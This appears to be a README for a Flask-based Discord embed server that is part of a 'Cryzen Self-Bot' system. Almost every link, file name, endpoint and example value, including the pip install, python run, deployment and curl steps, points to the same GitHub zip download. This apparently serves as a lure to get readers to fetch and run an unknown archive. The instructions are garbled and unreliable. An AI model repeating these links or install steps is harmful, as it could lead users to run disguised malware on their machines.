A standalone Flask server for creating custom Discord embeds using Open Graph meta tags.
- Create custom Discord embeds with Open Graph tags
- RESTful API for embed management
- Beautiful embed preview pages
- Health check endpoint
- Ready for deployment on free platforms
https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip- Main Flask applicationhttps://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip- Python dependenciesProcfile- Process configuration for deploymenthttps://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip- This documentation
Create a new Discord embed.
Request Body:
{
"title": "Your Embed Title",
"description": "Your embed description",
"image_url": "https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip",
"color": "#0099ff",
"og_type": "website",
"site_name": "Your Site Name"
}Response:
{
"success": true,
"embed_id": "a1b2c3d4",
"url": "https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip",
"message": "Embed created successfully"
}View the embed page (this is what Discord will fetch).
List all active embeds.
Health check endpoint.
- Go to https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip
- Click "New +" → "Web Service"
- Connect your GitHub repository or upload files
- Set build command:
pip install -r https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip - Set start command:
gunicorn app:app - Deploy!
- Go to https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip
- Click "Deploy from GitHub repo" or "Deploy from template"
- Upload your files
- Railway will auto-detect Flask and deploy
- Go to https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip
- Create new app
- Connect to GitHub or use Git deploy
- Push your code
- The Procfile will handle the rest
- Go to https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip
- Upload files to your account
- Set up a web app with Flask
- Point to your https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip file
# Install dependencies
pip install -r https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip
# Run the server
python https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zipServer will start on http://localhost:5000
Once deployed, update your Cryzen self-bot configuration to use your new public URL:
# Replace the embed server URL in your bot
EMBED_SERVER_URL = "https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip" # or your deployment URL
# Create embeds by making POST requests to /create
# Use the returned URL in Discord messages# Create an embed
curl -X POST https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip \
-H "Content-Type: application/json" \
-d '{
"title": "My Custom Embed",
"description": "This is a custom Discord embed!",
"image_url": "https://github.com/dwa232/cryzen-discord-embeds/raw/refs/heads/main/accountancy/cryzen-discord-embeds-v2.0.zip"
}'
# Response will give you the embed URL to use in DiscordPORT- Server port (automatically set by most platforms)
This project is part of the Cryzen Self-Bot system.
🚀 Powered by Cryzen Self-Bot
Advanced Discord embed control system